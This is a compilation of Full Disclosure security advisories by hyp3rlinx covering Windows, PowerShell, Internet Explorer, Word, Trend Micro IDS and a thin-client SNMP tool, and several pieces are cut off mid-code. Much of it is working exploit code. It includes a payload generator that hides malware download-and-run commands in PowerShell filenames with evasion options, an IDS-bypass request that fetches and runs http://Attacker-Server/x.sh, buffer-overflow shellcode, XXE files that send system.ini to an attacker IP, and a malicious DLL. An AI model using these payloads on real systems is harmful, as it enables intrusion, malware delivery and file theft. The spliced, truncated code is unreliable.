c:\>C:\Users\noprivs>c:\Users\privileged-victim\Contacts\whatever Access is denied. <= FALSE POSITIVE NO EXTENSION PRESENT IN THE FILENAME >From a defensive perspective we can leverage this to try to detect basic IOC and malware artifacts like .tmp, .ini, .dll, .exe or related config files on disk with user-only rights, instead of authenticating with admin rights as a quick paranoid first pass. Example, if malware hides itself by unlinking themselves from the EPROCESS list in memory or using programs like WinRAP to hide processess from Windows TaskMgr, we may not discover them even if using tasklist command. The EPROCESS structure and flink/blink is how Windows TaskMgr shows all running processes. However, we may possibly detect them by testing for the correct IOC name if the malicious code happens to reside on disk and not only in memory. Whats cool is we can be do this without the need for admin rights. Other Windows commands that will also let us confirm file existence by comparing error messages are start, call, copy, icalcs, and cd. However, Windows commands rename, ren, cacls, type, dir, erase, move or del commands will issue flat out "Access is denied" messages. Previously, MSRC recommended using ABE. However, that feature is only for viewing files and folders in a shared folder, not when viewing files or folders in the local file system. Tested successfully Win7/10 [Exploit/POC] "NtFileSins.py" from subprocess import Popen, PIPE import sys,argparse,re # Windows File Enumeration Intel Gathering. # Standard users can prove existence of privileged user artifacts. # # Typically, the Windows commands DIR or TYPE hand out a default "Access Denied" error message, # when a file exists or doesn't exist, when restricted access is attempted by another user. # # However, accessing files directly by attempting to "open" them from cmd.exe shell, # we can determi
[FD] GGPowerShell / Windows PowerShell Unsanitized RCE File Tool
Tool for creating Windows .PS files with the exploitable semicolon
condition. Has some options like reverse string PS command payload and
IP address as integer value etc...
http://hyp3rlinx.altervista.org/advisories/GGPowerShell.txt
from base64 import b64encode
from base64 import b64decode
from socket import *
import argparse,sys,socket,struct,re
#GGPowerShell
#Microsoft Windows PowerShell - Unsantized Filename RCE Dirty File Creat0r.
#
#Original advisory:
#http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-POWERSHELL-UNSANITIZED-FILENAME-COMMAND-EXECUTION.txt
#
#Original PoC:
#https://www.youtube.com/watch?v=AH33RW9g8J4
#
#By John Page (aka hyp3rlinx)
#Apparition Security
#=
#Features added to the original advisory script:
#
#Original script may have issues with -O for save files with certain
PS versions, so now uses -OutFile.
#
#Added: server port option (Base64 mode only)
#
#Added: -z Reverse String Command as an alternative to default Base64
encoding obfuscation.
#Example self reversing payload to save and execute a file "n.js" from
127.0.0.1 port 80 is only 66 bytes.
#
#$a='sj.n trats;sj.n eliFtuO- 1.0.0.721 rwi'[-1..-38]-join'';iex $a
#
#-z payload requires a forced malware download on server-side,
defaults port 80 and expects an ip-address.
#
#Added: IP to Integer for extra evasion - e.g 127.0.0.1 = 2130706433
#
#Added: Prefix whitespace - attempt to hide the filename payload by
push it to the end of the filename.
#
#Since we have space limit, malware names should try be 5 chars max
e.g. 'a.exe' including the ext to make room for
#IP/Host/Port and whitespace especially when Base64 encoding, for
reverse command string option we have more room to play.
#e.g. a.exe or n.js (1 char for the name plus 2 to 3 chars for ext
plus the dot).
#
#All in the name of the dirty PS filename.
#=
BANNER='''
_ __ _ ____
/ / / __ \ _ _ _/ ___// /_ |__ // / / /
/ / __/ / __/ /_/ / __ \ | /| / / _ \/ ___/\__ \/ __ \ /_ -i
flag, force-download or omit whitespace."
def parse_args():
parser.add_argument("-s", "--server", help="Server to download
malware from.")
parser.add_argument("-p", "--port", help="Malware server port,
defaults 80.")
parser.add_argument("-m", "--locf", help="Name for the Malware
upon download.")
parser.add_argument("-r", "--remf", nargs="?", help="Malware to
download from the remote server.")
parser.add_argument("-f", "--force_download", nargs="?",
const="1", help="No malware name specified, malwares force downloaded
from the server web-root, malware type must be known up front.")
parser.add_argument("-z", "--rev_str_cmd", nargs="?", const="1",
help="Reverse string command obfuscation Base64 alternative,
ip-address and port 80 only, Malware must be force downloaded on the
server-side, see -e.")
parser.add_argument("-w", "--wspace", help="Amount of whitespace
to use for added obfuscation, Base64 is set for 2 bytes.")
parser.add_argument("-i", "--ipevade", nargs="?", const="1",
help="Use the integer value of the malware servers IP address for
obfuscation/evasion.")
parser.add_argument("-e", "--example", nargs="?", const="1",
help="Show example use cases")
return parser.parse_args()
#self reverse PS commands
def rev_str_command(args):
malware=args.locf[::-1]
revload=malware
revload+=" trats;"
revload+=malware
revload+=" eliFtuO- "
revload+=args.server[::-1]
revload+=" rwi"
payload = "$a='"
payload+=malware
payload+=" trats;"
payload+=malware
payload+=" eliFtuO- "
payload+=args.server[::-1]
payload+=" rwi'[-1..-"+str(len(revload))
payload+="]-join '';iex $a"
return payload
def ip2int(addr):
return struct.unpack("!I", inet_aton(addr))[0]
def ip2hex(ip):
x = ip.split('.')
return '0x{:02X}{:02X}{:02X}{:02X}'.format(*map(int, x))
def obfuscate_ip(target):
IPHex = ip2hex(target)
return str(ip2int(IPHex))
def decodeB64(p):
return b64decode(p)
def validIP(host):
try:
socket.inet_aton(host)
return True
except socket.error:
return False
def filename_sz(space,cmds,mode):
if mode==0:
return len(FILENAME_PREFIX)+len(space)+ 1
+len(POWERSHELL_OBFUSCATED)+ 4 + len(cmds)+ len(";.ps1")
else:
return len(FILENAME_PREFIX) + len(space) + 1 + len(cmds) + len(";.ps1")
def check_filen
[FD] Trend Micro Deep Discovery Inspector IDS / Percent Encoding IDS Bypass
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-DEEP-DISCOVERY-INSPECTOR-PERCENT-ENCODING-IDS-BYPASS.txt
[+] ISR: Apparition Security
[Vendor]
www.trendmicro.com
[Product]
Deep Discovery Inspector
Deep Discovery Inspector is a network appliance that monitors all ports and
over 105 different network protocols to discover advanced threats and
targeted attacks
moving in and out of the network and laterally across it. The appliance
detects and analyzes malware, command-and-control (C) communications, and
evasive attacker
activities that are invisible to standard security defenses.
[Vulnerability Type]
Percent Encoding IDS Bypass
[CVE Reference]
Vendor decided not to release a CVE
[Security Issue]
Trend Micro Deep Discovery Inspector IDS will typically trigger alerts for
malicious system commands like "Wget Commandline Injection" and they will
be flagged as high.
Attacker payloads sent with normal ascii characters for example like "wget"
or even if they have been HEX encoded like "\x77\x67\x65\x74" they will
still get flagged and alerted on.
However, attackers can easily bypass these alerts by sending malicious
commands in HEX preceded by percent sign chars "%", e.g. "%77%67%65%74"
which also translates to "wget" and
will not get flagged or alerted on and may still be processed on the target
system.
e.g.
DDI RULE 2452
https://www.trendmicro.com/vinfo/us/threat-encyclopedia/network/ddi-rule-2452
Therefore, Trend Micro IDS alerts can be easily bypassed and the payload is
still run by the vulnerable target if the payload is encoded using
percent/hex encoding like %77%67%65%74.
That will not only bypass the IDE by having no alert triggered or
notification sent but the application will still process the malicious
command.
Importantly, the "wget" DDI Rule 2452 used is just an example and can
potentially be any malicious request where the IDS checks the character
encodings but fails to account for
percent encoded HEX character payload values.
[Exploit/POC]
from socket import *
#Bypass TM DDI IDS e.g. Rule 2452 (Wget command line injection) PoC
#Discovery: hyp3rlinx - ApparitionSec
#Apparition Security
#Firewall Rule Bypass
IP = raw_input("[+] Trend Micro IDS")
PORT = 80
payload="/index.php?s=/index/vulnerable/app/invoke=call_user_func_array[0]=system[1][]=%77%67%65%74%20
http://Attacker-Server/x.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a
"
req = "GET "+payload+" HTTP/1.1\r\nHost"+IP+"\r\nConnection: close\r\n\r\n"
s=socket(AF_INET, SOCK_STREAM)
s.connect((IP, PORT))
s.send(req)
res=""
while True:
res = s.recv(512)
print res
if res=="\n" or "":
break
s.close()
#Result is 200 HTTP OK and code execution on vuln app and No IDS Alert gets
triggered.
[Network Access]
Remote
[Severity]
High
[Disclosure Timeline]
Vendor Notification: May 14, 2019
Vendor confirmed the IDS Bypass: May 20, 2019
Vendor informed that a DDI IDS enhancement has been made: July 18, 2019
July 23, 2019 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] CVE-2019-13577 / MAPLE Computer WBT SNMP Administrator v2.0.195.15 / Unauthenticated Remote Buffer Overflow Code Execution 0day
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/MAPLE-WBT-SNMP-ADMINISTRATOR-v2.0.195.15-REMOTE-BUFFER-OVERFLOW-CODE-EXECUTION-0DAY.txt
[+] ISR: Apparition Security
[Vendor]
www.computerlab.com
[Product]
MAPLE Computer WBT SNMP Administrator (Thin Client Administrator)
v2.0.195.15
https://www.computerlab.com/index.php/downloads/category/27-device-manager
ftp://downloads.computerlab.com/software/SnmpSetup.195.15.EXE
SnmpSetup.195.15.EXE - MD5 Hash: a3913aae166c11ddd21dca437e78c3f4
The CLI Thin Client Manager is designed to provide remote management and
control of CLI Thin Clients.
This software is built on the TCP/IP industry standard SNMP (Simple Network
Communication Protocol).
Agents are built into the clients for remote management and configuration.
[Vulnerability Type]
Unauthenticated Remote Buffer Overflow Code Execution 0day
[CVE Reference]
CVE-2019-13577
[Security Issue]
SnmpAdm.exe in MAPLE WBT SNMP Administrator v2.0.195.15 has an
Unauthenticated Remote Buffer Overflow via a long string to the CE Remote
feature listening on Port 987.
This will overwrite data on the stack/registers and allow for control of
the programs execution flow resulting in attacker supplied remote code
execution.
Authentication is not required for this exploit.
This program seems to be packed using ASPack v2.12 and can be difficult to
unpack because it uses self-modifying code.
When installing the vulnerable program if asks for a serial number just
enter a value of "1" or something.
Upon launching the program if any errors occur try right click SnmpAdm.exe
and run it as Admin.
Interestingly, it seems to drop DLLs with .tmp extensions in
AppData\Local\Temp directory, make OS system files viewable in explorer to
see them.
e.g. C:\Users\blah\AppData\Local\Temp\~ip6B92.tmp
ASLR / SEH all set to False helping to make exploit more portable.
CALL EBX
10008FB3 0x10008fb3 : call ebx | null {PAGE_EXECUTE_READ} [ipwSNMPv5.dll]
ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.0.1364
(C:\Program Files (x86)\SnmpAdm\ipwSNMPv5.dll)
Stack dump:
EAX 41414141
ECX 0018FEFC
EDX 0018FF10
EBX 022DDA78 ASCII
"AAA
ESP 0018FECC
EBP 0018FEF4
ESI 0018FF10
EDI 0018FEFC
EIP 41414141
C 0 ES 002B 32bit 0()
P 1 CS 0023 32bit 0()
A 0 SS 002B 32bit 0()
Z 0 DS 002B 32bit 0()
S 0 FS 0053 32bit 7EFDD000(FFF)
T 0 GS 002B 32bit 0()
D 0
O 0 LastErr ERROR_NO_SCROLLBARS (05A7)
EFL 00010206 (NO,NB,NE,A,NS,PE,GE,G)
[Exploit/POC]
from socket import *
import struct,sys,argparse
#MAPLE WBT SNMP Administrator (SnmpAdm.exe) v2.0.195.15
#CVE-2019-13577
#Remote Buffer Overflow 0day
#hyp3rlinx - ApparitionSec
#Pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")
eip = struct.pack(" 1:
print "[*] No args supplied see Help -h"
exit()
main(parse_args())
[POC Video URL]
https://www.youtube.com/watch?v=THMqueCIrFw
[Network Access]
Remote
[Severity]
High
[Disclosure Timeline]
Vendor Notification: July 10, 2019
Second vendor notification attempt: July 13, 2019
No vendor replies.
July 17, 2019 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Re: [FD] Microsoft Compiled HTML Help / Uncompiled .chm File XML External Entity
[** CORRECTION Fixed Port Typo] [+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-HTML-HELP-UNCOMPILED-CHM-FILE-XML-EXTERNAL-ENTITY-INJECTION.txt [+] ISR: ApparitionSec [Vendor] www.microsoft.com [Product] Microsoft Compiled HTML Help "hh.exe" Microsoft Compiled HTML Help is a Microsoft proprietary online help format, consisting of a collection of HTML pages, an index and other navigation tools. The files are compressed and deployed in a binary format with the extension .CHM, for Compiled HTML. The format is often used for software documentation. CHM is an extension for the Compiled HTML file format, most commonly used by Microsoft's HTML-based help program. [Vulnerability Type] Uncompiled .CHM File XML External Entity Injection [CVE Reference] N/A [Security Issue] CHM Files are usually created using Microsofts "HTML Help Workshop" program. However, I find a way to bypass using this program and create them easily by simply adding double .chm extension to the file ".chm.chm". Compiled HTML Help "hh.exe" will then respect and open it processing any JS/HTML/XML inside etc. Compiled HTML Help is also vulnerable to XML External Entity attacks allowing remote attackers to steal and exfiltrate local system files. Whats interesting about this one is we can create the file without using the "Microsoft HTML Help Workshop" program. Also, we can steal files without having to use the "hhtctrl.ocx" ActiveX control CLASSID: 52a2aaae-085d-4187-97ea-8c30db990436 or other code execution methods. While CHM is already considered a "dangerous" file type and other type of attacks have already been documented. I thought this was an interesting way to create CHM files "Uncompiled" bypassing the default creation steps while stealing local files in the process. Note: User interaction is required to exploit this vulnerability. [Exploit/POC] 1) python -m SimpleHTTPServer 2) "XXE.chm.chm" Uncompiled CHM File XXE PoC http://localhost:81/payload.dtd;> %dtd;]> 3) "payload.dtd" (hosted in python web-server dir port 81 above) http://localhost:81?%file;'>"> %all; Open the "XXE.chm.chm" file and will exfil Windows "system.ini", attacker Server IP is set to localhost using port 81 for PoC. Tested successfully Windows 7/10 [POC Video URL] https://www.youtube.com/watch?v=iaxp1iBDWXY [Network Access] Remote [Severity] High [Disclosure Timeline] Vendor Notification: April 25, 2019 MSRC Response: "We determined that this behavior is considered to be by design" July 16, 2019 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx On Tue, Jul 16, 2019 at 12:10 AM hyp3rlinx wrote: > [+] Credits: John Page (aka hyp3rlinx) > [+] Website: hyp3rlinx.altervista.org > [+] Source: > http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-HTML-HELP-UNCOMPILED-CHM-FILE-XML-EXTERNAL-ENTITY-INJECTION.txt > [+] ISR: ApparitionSec > > > [Vendor] > www.microsoft.com > > > [Product] > Microsoft Compiled HTML Help "hh.exe" > > Microsoft Compiled HTML Help is a Microsoft proprietary online help > format, consisting of a collection of HTML pages, an index and other > navigation tools. > The files are compressed and deployed in a binary format with the > extension .CHM, for Compiled HTML. The format is often used for software > documentation. > CHM is an extension for the Compiled HTML file format, most commonly used > by Microsoft's HTML-based help program. > > > [Vulnerability Type] > Uncompiled .CHM File XML External Entity Injection > > > [CVE Reference] > N/A > > > [Security Issue] > CHM Files are usually created using Microsofts "HTML Help Workshop" > program. However, I find a way to bypass using this program and create them > easily by > simply adding double .chm extension to the file ".chm.chm". Compiled HTML > Help "hh.exe" will then respect and open it processing any JS/HTML/XML > insid
[FD] Microsoft File Checksum Integrity Verifier "fciv.exe" v2.05 / DLL Hijack Arbitrary Code Execution
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-FILE-CHECKSUM-VERIFIER-v2.05-DLL-HIJACKING-ARBITRARY-CODE-EXECUTION.txt
[+] ISR: Apparition Security
[Vendor]
www.microsoft.com
[Product]
File Checksum Integrity Verifier version 2.05 "fciv.exe"
Download:
https://www.microsoft.com/en-us/download/details.aspx?id=11533
Excerpt from the FCIV "ReadMe.txt" file.
"Fciv is a command line utility that computes and verifies hashes of files.
It computes a MD5 or SHA1 cryptographic hash of the content of the file.
If the file is modified, the hash is different.
With fciv, you can compute hashes of all your sensitive files.
When you suspect that your system has been compromised, you can run a
verification to determine which files have been modified.
You can also schedule verifications regularily."
[Vulnerability Type]
DLL Hijacking Arbitrary Code Execution
[CVE Reference]
N/A
[Security Issue]
File Checksum Integrity Verifier "fciv.exe" will load and execute arbitrary
DLLs "CRYPTSP.dll" or "USERENV.dll"
when verifying a file hash, if one of those DLLs exist in the same
directory (CWD) from where FCIV is run.
During testing I observed that on a Windows 10 system both "CRYPTSP.dll" or
"USERENV.dll" will execute no problem.
However, only "CRYPTSP.dll" seems to work on the Windows 7 machine I tested.
Therefore, if a malware is named "CRYPTSP.dll" or "USERENV.dll" and you try
to verify its hash it will instead get executed.
Upon successfull exploit user will get the following error.
//
// File Checksum Integrity Verifier version 2.05.
//
Error during CryptAcquireContext.
Error msg : The specified procedure could not be found.
Error code : 7f
Again, to exploit this the victim must run the FCIV from an infected
directory where the compromised DLL lives.
c:\>fciv.exe "CRYPTSP.dll"
OR from network share where an attacker has write privileges.
net use z: \\x.x.x.x\c$ /user:victim
z:\Users\victim\Desktop>fciv.exe c:\Windows
This was tested successfully on Windows 7/10
[Exploit/POC]
Create a DLL named "cryptsp.dll" and download to your default Downloads
directory or wherever.
"evil.c"
#include
//gcc -shared -o cryptsp.dll evil.c
void evilo(void){
WinExec("calc", 0);
}
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID
lpvReserved){
evilo();
return 0;
}
Start fciv.exe from the same dir where cryptsp.dll resides to verify the
hash of the DLL.
C:\Users\victim\Downloads>fciv.exe cryptsp.dll
BOOM! no hash verified but we do get arbitrary code execution...
[Network Access]
Remote
[Severity]
High
[Disclosure Timeline]
Vendor Notification: June 3, 2019
MSRC Response: "The Checksum Integrity Verifier tool is not supported by
Microsoft." : June 7, 2019
July 4, 2019 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Microsoft Word (2016) / Deceptive File Reference Vuln
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WORD-DECEPTIVE-FILE-REFERENCE.txt [+] ISR: ApparitionSec [+] Zero Day Initiative Program [Vendor] www.microsoft.com [Product] Microsoft Word 2016 [Vulnerability Type] Deceptive File Reference [References] ZDI-CAN-7949 [Security Issue] When a MS Word ".docx" File contains a hyperlink to another file, it will run the first file it finds in that directory with a valid extension. But will present to the end user an extension-less file in its Security warning dialog box without showing the extension type. If another "empty" file of the same name as the target executable exists but has no file extension. Because the extension is supressed it makes the file seem harmless and the file can be masked to appear as just a folder etc. This can potentially trick user into running unexpected code, but will only work when you have an additional file of same name with NO extension on it. [Exploit/POC] 1) Create a directory "PoC" 2) Create a folder in PoC directory named "Downloads Folder" 3) Create a .BAT file named "Downloads Folder.bat" in the .BAT create some command like "start calc.exe" 4) Create an empty file named "Downloads Folder" with no file extension 5) Create the Word ".docx" file with a hyperlink pointing to "PoC/Downloads Folder/Downloads Folder" Upon opening the link Word will give user an vague dialog box about asking if they want to open the file. However, the prompt shows an apparent folder structure and no file extension .exe, .com etc are visible or displayed to the end user. Click the link to open what looks to be a folder then BOOM! the .BAT file runs instead. Of course any exeuctable will do .EXE etc. [Network Access] Local [Severity] High [POC Video URL] https://www.youtube.com/watch?v=irxkV_qGG9Y [Disclosure Timeline] Notification: Trend Micro Zero Day Initiative Program : 2019-01-25 Case officially contracted to ZDI : 2019-02-06 Vendor Disclosure : 2019-02-15 submitted to the vendor as ZDI-CAN-7949. ZDI Response : "We have synced with the vendor and they have resolved that this case does not meet the bar for security servicing. Therefore we will proceed to close it on our end." 2019-06-14 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Windows PowerShell ISE / Filename Parsing Flaw Remote Code Execution 0day
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/WINDOWS-POWERSHELL-ISE-FILENAME-PARSING-FLAW-RCE-0DAY.txt [+] ISR: ApparitionSec [+] Zero Day Initiative Program [Vendor] www.microsoft.com [Product] Windows PowerShell ISE The Windows PowerShell Integrated Scripting Environment (ISE) is a host application for Windows PowerShell. In the ISE, you can run commands and write, test, and debug scripts in a single Windows-based graphic user interface. [Vulnerability Type] Filename Parsing Flaw Remote Code Execution 0day [References] ZDI-CAN-8005 [Security Issue] Windows PowerShell ISE will execute wrongly supplied code when debugging specially crafted PowerShell scripts that contain array brackets as part of the filename. This can result in ISE executing attacker supplied scripts pointed to by the filename and not the "trusted" PS file currently loaded and being viewed by a user in the host application. This undermines the integrity of PowerShell ISE allowing potential unexpected remote code execution. In PowerShell brackets are used to access array elements. PS C:\> $a=1..10 PS C:\> $a[4] 5 However, when brackets are used as part of the filename it can be used to hijack the currently loaded file in place of another malicious file. That file must contain a single matching char value which is also found in our specially crafted filename. Requirements are both files must reside in the same directory. Example, if a file named [HelloWorldTutoria1].ps1 resides alongside a file named 1.ps1 it will create a script hijacking condition. Note, the last letter is a number "1" not a lowercase "L". Other things I discovered playing with PS filenames is we can target scripts using a single alphabetic or numeric char and certain symbols. PowerShell scripts with only a single quote also work, [Pwned'].ps1 will load and execute ===> '.ps1 if debugged from the vuln ISE application. These chars also get the job done: "$" "_" "#" "^" plus any single case insensitive letter a-z or numbers 0-9, [Hello_World].ps1 > _.ps1 [Hello].ps1 will execute this instead => h.ps1 Dashes "-" throw the following error: "The specified wildcard character pattern is not valid: [Hello-World].ps1" when pointing to another PS file named -.ps1 and seems to treat it sort of like a meta-character. [pw3d].ps1 <= expected to execute 3.ps1 <= actually executed This exploits the trust between PowerShell ISE and the end user. So scripts debugged local or over a network share display "trusted" code in ISE that is expected to run. However, when the user debugs the script a different script gets executed. Interestingly, that second script does NOT get loaded into PowerShell ISE upon execution, so a user may not see anything amiss. User interaction is required for a successful attack to occur and obviously running any unknown PowerShell script can be dangerous. Again, this exploit takes advantage of "trust" where users can see and read the code and will trust it as everything looks just fine and yet ... still they get PWNED!. Tested successfully on Win7/10 Long live user interaction! lol... [POC Video URL] https://www.youtube.com/watch?v=T2I_-iUPaFw [Exploit/POC] After opening PS files in ISE, set the execution policy so can test without issues. set-executionpolicy unrestricted -force PS scripts over Network shares may get 'RemoteSigned' security policy issue so run below cmd. set-executionpolicy unrestricted -force process Choose 'R' to run once. Below Python script will create two .ps1 files to demonstrate the vulnerable condition. Examine the code, what does it say? it reads... Write-output "Hello World!"... now Run it... BAM! other PS script executes!. #PowerShell ISE 0day Xploit #ZDI-CAN-8005 #ZDI CVSS: 7.0 #hyp3rlinx #ApparitionSec fname1="[HelloWorldTutoria1].ps1"#Expected code to run is 'HelloWorld!' fname2="1.ps1" #Actual code executed is calc.exe for Poc evil_code="start calc.exe" #Edit to suit your needs. c=0 payload1='Write-Output "Hello World!"' payload2=evil_code+"\n"+'Write-Output "Hello World!"' def mk_ps_hijack_script(): global c c+=1 f=open(globals()["fname"+str(c)],"wb") f.write(globals()["payload"+str(c)]) f.close() if c<2: mk_ps_hijack_script() if __name__=="__main__": mk_ps_hijack_script() print "PowerShell ISE Xploit 0day Files Created!" print "Discovery by hyp3rlinx" print "ZDI-CAN-8005" [Network Access] Remote [Severity] High [Disclosure Timeline] ZDI Case opened : 2019-02-06 Case officially contracted to ZDI : 2019-02-20 Vendor Disclosu
Re: [FD] Microsoft Internet Explorer v11 / XML External Entity Injection 0day
Vimeo reinstated my account few hours later but I switched to youtube for now.. but will check those out. Thank you for that... hyp3rlinx On Tue, Apr 16, 2019 at 4:12 AM bo0od wrote: > have your own videos either on one of the PeerTubes instances or have > your own instance. > > https://joinpeertube.org/en/ > > other good alternative would be: > > https://mediagoblin.org/pages/tour.html > > Enjoy! > > hyp3rlinx: > > vimeo removed my account for no good reason so new POC url is included. > > > > [+] Credits: John Page (aka hyp3rlinx) > > [+] Website: hyp3rlinx.altervista.org > > [+] Source: > > > http://hyp3rlinx.altervista.org/advisories/MICROSOFT-INTERNET-EXPLORER-v11-XML-EXTERNAL-ENTITY-INJECTION-0DAY.txt > > [+] ISR: ApparitionSec > > > > > > [Vendor] > > www.microsoft.com > > > > > > [Product] > > Microsoft Internet Explorer v11 > > (latest version) > > > > Internet Explorer is a series of graphical web browsers developed by > > Microsoft and included in the Microsoft Windows line of operating > systems, > > starting in 1995. > > > > > > [Vulnerability Type] > > XML External Entity Injection > > > > > > > > [CVE Reference] > > N/A > > > > > > > > [Security Issue] > > Internet Explorer is vulnerable to XML External Entity attack if a user > > opens a specially crafted .MHT file locally. > > > > This can allow remote attackers to potentially exfiltrate Local files and > > conduct remote reconnaissance on locally installed > > Program version information. Example, a request for > "c:\Python27\NEWS.txt" > > can return version information for that program. > > > > Upon opening the malicious ".MHT" file locally it should launch Internet > > Explorer. Afterwards, user interactions like duplicate tab "Ctrl+K" > > and other interactions like right click "Print Preview" or "Print" > commands > > on the web-page may also trigger the XXE vulnerability. > > > > However, a simple call to the window.print() Javascript function should > do > > the trick without requiring any user interaction with the webpage. > > Importantly, if files are downloaded from the web in a compressed archive > > and opened using certain archive utilities MOTW may not work as > advertised. > > > > Typically, when instantiating ActiveX Objects like "Microsoft.XMLHTTP" > > users will get a security warning bar in IE and be prompted > > to activate blocked content. However, when opening a specially crafted > .MHT > > file using malicious markup tags the user will get no such > > active content or security bar warnings. > > > > e.g. > > > > C:\sec>python -m SimpleHTTPServer > > Serving HTTP on 0.0.0.0 port 8000 ... > > 127.0.0.1 - - [10/Apr/2019 20:56:28] "GET /datatears.xml HTTP/1.1" 200 - > > 127.0.0.1 - - [10/Apr/2019 20:56:28] "GET > > > /?;%20for%2016-bit%20app%20support[386Enh]woafont=dosapp.fonEGA80WOA.FON=EGA80WOA.FONEGA40WOA.FON=EGA40WOA.FONCGA80WOA.FON=CGA80WOA.FONCGA40WOA.FON=CGA40WOA.FON[drivers]wave=mmdrv.dlltimer=timer.drv[mci] > > HTTP/1.1" 200 - > > > > > > Tested successfully in latest Internet Explorer Browser v11 with latest > > security patches on Win7/10 and Server 2012 R2. > > > > > > > > [POC/Video URL] > > https://www.youtube.com/watch?v=fbLNbCjgJeY > > > > > > > > [Exploit/POC] > > POC to exfil Windows "system.ini" file. > > Note: Edit attacker server IP in the script to suit your needs. > > > > 1) Use below script to create the "datatears.xml" XML and XXE embedded > > "msie-xxe-0day.mht" MHT file. > > > > 2) python -m SimpleHTTPServer > > > > 3) Place the generated "datatears.xml" in Python server web-root. > > > > 4) Open the generated "msie-xxe-0day.mht" file, watch your files be > > exfiltrated. > > > > > > #Microsoft Internet Explorer XXE 0day > > #Creates malicious XXE .MHT and XML files > > #Open the MHT file in MSIE locally, should exfil system.ini > > #By hyp3rlinx > > #ApparitionSec > > > > ATTACKER_IP="localhost" > > PORT="8000" > > > > mht_file=( > > 'From:\n' > > 'Subject:\n' > > 'Date:\n' > > 'MIME-Version: 1.0\n' > > 'Content-Type: multipart/related; type="text/html";\n' > > '\tboundary="=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_0001&quo
[FD] Microsoft Internet Explorer v11 / XML External Entity Injection 0day
vimeo removed my account for no good reason so new POC url is included.
[+] Credits: John Page (aka hyp3rlinx)
